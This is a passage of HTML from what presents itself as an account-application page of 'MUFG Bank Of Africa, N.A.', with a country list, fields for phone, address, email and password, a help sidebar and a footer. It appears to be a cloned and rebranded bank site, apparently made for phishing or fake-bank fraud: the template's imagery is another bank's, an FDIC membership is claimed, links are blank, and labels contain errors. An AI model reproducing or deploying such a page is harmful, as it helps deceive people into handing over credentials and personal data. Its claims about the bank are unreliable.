                                    <option value="MLI">Mali </option>
                                    <option value="MLT">Malta </option>
                                    <option value="MHL">Marshall Islands </option>
                                    <option value="MTQ">Martinique </option>

                                    <option value="MRT">Mauritania </option>
                                    <option value="MVS">Mauritius </option>
                                    <option value="MYT">Mayotte </option>
                                    <option value="MEX">Mexico </option>
                                    <option value="FSM">Micronesia, Federated 
									States of </option>
                                    <option value="MDA">Moldova, Republic of </option>

                                    <option value="MCO">Monaco </option>
                                    <option value="MNG">Mongolia </option>
                                    <option value="MSR">Montserrat </option>
                                    <option value="MAR">Morocco </option>
                                    <option value="MOZ">Mozambique </option>
                                    <option value="MMR">Myanmar </option>

                                    <option value="NAM">Namibia </option>
                                    <option value="NRU">Nauru </option>
                                    <option value="NPL">Nepal </option>
                                    <option value="NLD">Netherlands </option>
                                    <option value="ANT">Netherlands Antilles </option>
                                    <option value="NCL">New Caledonia </option>

                                    <option value="NZL">New Zealand </option>
                                    <option value="NIC">Nicaragua </option>
                                    <option value="NER">Niger </option>
                                    <option value="NGA">Nigeria </option>
                                    <option value="NIU">Niue </option>
                                    <option value="NFK">Norfolk Island </option>

                                    <option value="MNP">Northern Mariana Islands 
                                    </option>
                                    <option value="MOR">Norway </option>
                                    <option value="OMN">Oman </option>
                                    <option value="PAK">Pakistan </option>
                                    <option value="PLW">Palau </option>
                                    <option value="PAN">Panama </option>

                                    <option value="PNG">Papua New Guinea </option>
                                    <option value="PRY">Paraguay </option>
                                    <option value="PER">Peru </option>
                                    <option value="PHL">Philippines </option>
                                    <option value="PCN">Pitcairn </option>
                                    <option value="POL">Poland </option>

                                    <option value="PRT">Portugal </option>
                                    <option value="PRI">Puerto Rico </option>
                                    <option value="QAT">Qatar </option>
                                    <option value="REU">Reunion </option>
                                    <option value="ROM">Romania </option>
                                    <option value="RUS">Russian Federation </option>

                                    <option value="RWA">Rwanda </option>
                                    <option value="KNA">Saint Kitts and Nevis 
                                    </option>
                                    <option value="LCA">Saint Lucia </option>
                                    <option value="VCT">Saint Vincent and the 
									Grenadines </option>
                                    <option value="WSM">Samoa </option>
                                    <option value="SMR">San Marino </option>

                                    <option value="STP">Sao Tome and Principe 
                                    </option>
                                    <option value="SAU">Saudi Arabia </option>
                                    <option value="SEN">Senegal </option>
                                    <option value="SYC">Seychelles </option>
                                    <option value="SLE">Sierra Leone </option>
                                    <option value="SGP">Singapore </option>

                                    <option value="SVK">Slovakia (Slovak 
									Republic) 
                                    </option>
                                    <option value="SVN">Slovenia </option>
                                    <option value="SLB">Solomon Islands </option>
                                    <option value="SOM">Somalia </option>
                                    <option value="ZAF">South Africa </option>
                                    <option value="SGS">South Georgia and the 
									South Sandwich Islands </option>

                                    <option value="ESP">Spain </option>
                                    <option value="LKA">Sri Lanka </option>
                                    <option value="SHN">St. Helena </option>
                                    <option value="SPM">St. Pierre and Miquelon 
                                    </option>
                                    <option value="SDN">Sudan </option>
                                    <option value="SUR">Suriname </option>

                                    <option value="SJM">Svalbard and Jan Mayen 
									Islands </option>
                                    <option value="SWZ">Swaziland </option>
                                    <option value="SWE">Sweden </option>
                                    <option value="CHE">Switzerland </option>
                                    <option value="SYR">Syrian Arab Republic </option>
                                    <option value="TWN">Taiwan </option>

                                    <option value="TJK">Tajikistan </option>
                                    <option value="TZA">Tanzania, United 
									Republic of </option>
                                    <option value="THA">Thailand </option>
                                    <option value="TGO">Togo </option>
                                    <option value="TKL">Tokelau </option>
                                    <option value="TON">Tonga </option>

                                    <option value="TTO">Trinidad and Tobago </option>
                                    <option value="TUN">Tunisia </option>
                                    <option value="TUR">Turkey </option>
                                    <option value="TKM">Turkmenistan </option>
                                    <option value="TCA">Turks and Caicos Islands 
                                    </option>
                                    <option value="TUV">Tuvalu </option>

                                    <option value="UGA">Uganda </option>
                                    <option value="UKR">Ukraine </option>
                                    <option value="ARE">United Arab Emirates </option>
                                    <option value="UMI">United States Minor 
									Outlying Islands </option>
                                    <option value="URY">Uruguay </option>
                                    <option value="UZB">Uzbekistan </option>

                                    <option value="VUT">Vanuatu </option>
                                    <option value="VAT">Vatican City State (Holy 
									See) </option>
                                    <option value="VEN">Venezuela </option>
                                    <option value="VNM">Viet Nam </option>
                                    <option value="VGB">Virgin Islands (British) 
                                    </option>
                                    <option value="VIR">Virgin Islands (U.S.) 
                                    </option>

                                    <option value="WLF">Wallisw and Futuna 
									Islands 
                                    </option>
                                    <option value="ESH">Western Sahara </option>
                                    <option value="YEM">Yeman </option>
                                    <option value="YUG">Yugoslavia </option>
                                    <option value="ZAR">Zaire </option>
                                    <option value="ZMB">Zambia </option>

                                    <option value="ZWE">Zimbabwe </option>
                                    <option value="UNK">Not Listed </option>
                                  </select>
             </div>
              <div class="field">
            <input type="text" name="zipcode" class="flat" placeholder="Zip Code" required>
            </div>
             <div class="field">
            <input type="tel" name="tel" class="flat" placeholder="Telephone" required>
            </div>
             <div class="field">
            <input type="text" name="fax2" class="flat" placeholder="Fax">
            </div>
             <div class="field">
            <input type="text" name="mobile" class="flat" placeholder="Mobile" required>
            </div>
             <div class="field">
            <select name="address_length" class="flat">
            	<option value="">Choose Address Length </option>
                <option value="1 Year">1 Year </option>
                <option value="2 Year">2 Year </option>
                <option value="3 Year">3 Year </option>
                <option value="+4 Year">+4 Year</option>
            </select>
            </div>
             <div class="field">
             <select name="home_status" class="flat">
            	<option value="">Choose Home Type</option>
                <option value="Own">Own </option>
                <option value="Rent">Rent</option>
                <option value="Other">Other</option>
            </select>
            </div>
             <div class="field">
           <input type="email" name="email" class="flat" placeholder="Email" required>
           </div>
            <div class="field">
           <input type="password" name="password" class="flat" placeholder="Password" required> 
           </div>
            <div class="field">
           What type of account do you want to run?
           </div>
            <div class="field">
           <select name="account_type" class="flat">
            	<option value="">Choose Account Type</option>
                <option value="Fixed Deposit">1 Year </option>
                <option value="Savings">Savings</option>
                <option value="Transit">Transit</option>
            </select>
            </div>
             <div class="field">
           By clicking submit, you agree to be bound by our <a href="">terms</a> and <a href="">policies</a>
           </div>
            <div class="field">
        <input  type="Submit" name="submit" class="flat" id="submit" value="Submit" title = "Submit"/>
        </div>
            </form>
        </div>
<div class="ub-dotted-line-horiz ub-1em-n"> </div>
						
						<div class="ub-dotted-line-horiz"> </div>
						</div>
				</div>
			</div>
			<div class="main-content-right-rail">

				
				
					

<style>
.help-cta-row {border-top:1px dotted #6F6F6F; min-height:40px; padding:6px 0;}
.help-cta-row.no-border {border-top:0 none;}
.help-cta-unit-title {font-size:1.2em; font-weight:bold;}
.help-cta-unit-right ol, .help-cta-unit ol {list-style:decimal inside none; margin:0.25em 0;}
.help-cta-unit-right a, .help-cta-unit a {color:#FFFFFF; text-decoration:underline;}
</style>
<div class="get-started component shadow shadow-box">
	<span class="disclaimer-group-ref">tcm:9-42463</span>
	
		<div class="get-started-title">HELP</div>
	
	
		<div class="help-cta-row">
			
			
				<div class="help-cta-unit">
			
			
					<div class="help-cta-unit-title">
						Quick Answers/FAQs:
					</div>
			
			<ol>
				
					<li>
						
							<a href="" class="">
								What&#39;s my routing/ABA number?
							</a>
						
						
						
					</li>
				
					<li>
						
							<a href="" class="">
								How do I activate an ATM or debit card?
							</a>
						
						
						
					</li>
				
					<li>
						
							<a href="" class="">
								How do I reorder checks?
							</a>
						
						
						
					</li>
				
					<li>
						
							<a href="" class="">
								How can I change my address/phone info?
							</a>
						
						
						
					</li>
				
					<li>
						
							<a href="" class="">
								I forgot/lost my online banking password.
							</a>
						
						
						
					</li>
				
					<li>
						
							<a href="" class="">
								How do I stop payment on a check?
							</a>
						
						
						
					</li>
				
					<li>
						
							<a href="" class="">
								How do I transfer funds to another account through online banking?
							</a>
						
						
						
					</li>
				
					<li>
						
							<a href="" class="">
								How do I investigate/dispute a purchase that appears on my account?
							</a>
						
						
						
					</li>
				
					<li>
						
							<a href="" class="">
								How can I view my account history in online banking?
							</a>
						
						
						
					</li>
				
			</ol>
			
				<a href="">See All &gt;</a>
			
			</div>
			<div class="clear"></div>
		</div>
	
</div>
<div class="home-message-area-item">
<span class="disclaimer-group-ref">tcm:9-42649</span>
	
		<img src="../Images/send_feedback.gif"  alt="Send Feedback" title="Send Feedback" width="224" height="100"/>
	 
	 
	
		<a href="#"   class="cta-button "><span class="text">Go</span></a>	 
	 
<div class="home-message-area-item-text">
	
	 
</div>
</div>
			

<div class="home-message-area-item">
<span class="disclaimer-group-ref">tcm:9-67958</span>
	
		<img src="../Images/union_bank_holidays.jpg"  alt="Official Bank Of Africa Holidays" title="Official Bank Of Africa Holidays" width="224" height="100"/>
	 
	 
	
		<a href="#"   class="cta-button "><span class="text">Go</span></a>	 
	 
<div class="home-message-area-item-text">
	
		<div class="component-content"></div>
	 
</div>
</div>
	
				
			</div>
			
			<div class="clear"></div>
		</div>

	</div>

	<!-- disclaimer footer -->
	
	<!-- /disclaimer footer -->

		<!-- footer -->
	
		

<div class="footer">
    
        
            <div>
                

<span class="disclaimer-group-ref">tcm:9-42490</span>
<dl class="footer-links">
<dt>About Us</dt>
<dd>
<ul class="footer-links-list">
	
		
			<li><a href=""   >
				Careers
			</a></li>
		 
		 
		 
	
		 
		
			<li><a href=""      >Newsroom</a></li>
		 
		 
	
		 
		 
		
			<li><a href="../Images/MUFG_Corporate_Profile.pdf">
				Corporate Profile
			</a></li>
		 
	
		 
		
			<li><a href=""      >Community Outreach</a></li>
		 
		 
	
		 
		
			<li><a href=""      >Diversity and Culture</a></li>
		 
		 
	
		 
		
			<li><a href=""      >Corporate Social Responsibility</a></li>
		 
		 
	
		 
		
			<li><a href=""      >Our Parent - MUFG</a></li>
		 
		 
	
		 
		
			<li><a href="">Hearing-impaired &amp; Visually Impaired Services</a></li>
		 
		 
	
</ul>
</dd>
</dl>            </div>
        
            <div>
                

<span class="disclaimer-group-ref">tcm:9-42491</span>
<dl class="footer-links">
<dt>Privacy &amp; Security</dt>
<dd>
<ul class="footer-links-list">
	
		 
		
			<li><a href=""      >Privacy &amp; Security Center</a></li>
		 
		 
	
		 
		
			<li><a href=""      >Online Security</a></li>
		 
		 
	
		 
		
			<li><a href=""      >Identity Theft</a></li>
		 
		 
	
		 
		
			<li><a href=""      >Fraud Education</a></li>
		 
		 
	
		
			<li><a href=""   >
				Privacy Policy
			</a></li>
		 
		 
		 
	
</ul>
</dd>
</dl>            </div>
        
            <div>
                

<span class="disclaimer-group-ref">tcm:9-42493</span>
<dl class="footer-links">
<dt>Corporate Social Responsibility</dt>
<dd>
<ul class="footer-links-list">
	
		 
		
			<li><a href="">Charitable Contributions</a></li>
		 
		 
	
		 
		
			<li><a href="">Serving Communities</a></li>
		 
		 
	
		 
		
			<li><a href="">Environmental Sustainability</a></li>
		 
		 
	
		 
		
			<li><a href="">Supplier Diversity</a></li>
		 
		 
	
		 
		
			<li><a href="">Key People</a></li>
		 
		 
	
</ul>
</dd>
</dl>            </div>
        
            <div>
                

<span class="disclaimer-group-ref">tcm:9-42494</span>
<dl class="footer-links">
<dt>Corporate Profile</dt>
<dd>
<ul class="footer-links-list">
	
		 
		 
		
			<li><a href="">
				History &amp; Timeline
			</a></li>
		 
	
		 
		
			<li><a href="">Policy-Making Officers</a></li>
		 
		 
	
		 
		
			<li><a href="">Our Parent - About MUFG</a></li>
		 
		 
	
		 
		
			<li><a href="">Investor Relations</a></li>
		 
		 
	
		 
		
			<li><a href="">Diversity &amp; Inclusion</a></li>
		 
		 
	
</ul>
</dd>
</dl>            </div>
        
    
    <div class="clear"></div>
</div>

   
           <script type="text/javascript">
     ub.backgrounds = ['/ubimages/ub-about-bg-gradient.jpg'];
</script>
   

	
	<!-- /footer -->

	<!-- copyright footer -->
	
		

<div class="copyright-footer">
	
		<p class="copyright-text clearfix">
        <span class="year current-year"></span>
        <script type="text/javascript">try{dom.query('.current-year').html('&copy;' + (new Date()).getFullYear());} catch(e) {}</script>
        MUFG Bank Of Africa, N.A. All rights reserved. Member FDIC. <span class="trade">Equal Housing Lender</span>
					<br />
					<span class="copyright">Bank Of Africa is a registered trademark and brand name of MUFG Bank Of Africa, N.A.</span>
    </p>	
	
		<span class="disclaimer-group-ref">tcm:9-58696</span>
<div class="copyright-footer-bottom clearfix">
<div class="social-media-link-container"><span class="social-media-link-label">Follow us</span>
<ul class="social-media-links">
<li><a class="facebook-link facebook-icon social-media-icon" href=""> </a></li>
<li><a class="twitter-link twitter-icon social-media-icon" href=""> </a></li>
<li><a class="linkedin-link linkedin-icon social-media-icon" href=""> </a></li>
<li><a class="youtube-link youtube-icon social-media-icon" href=""> </a></li>
</ul>
</div>
</div>	
</div>
	
	<!-- /copyright footer -->

	
</body>
</html>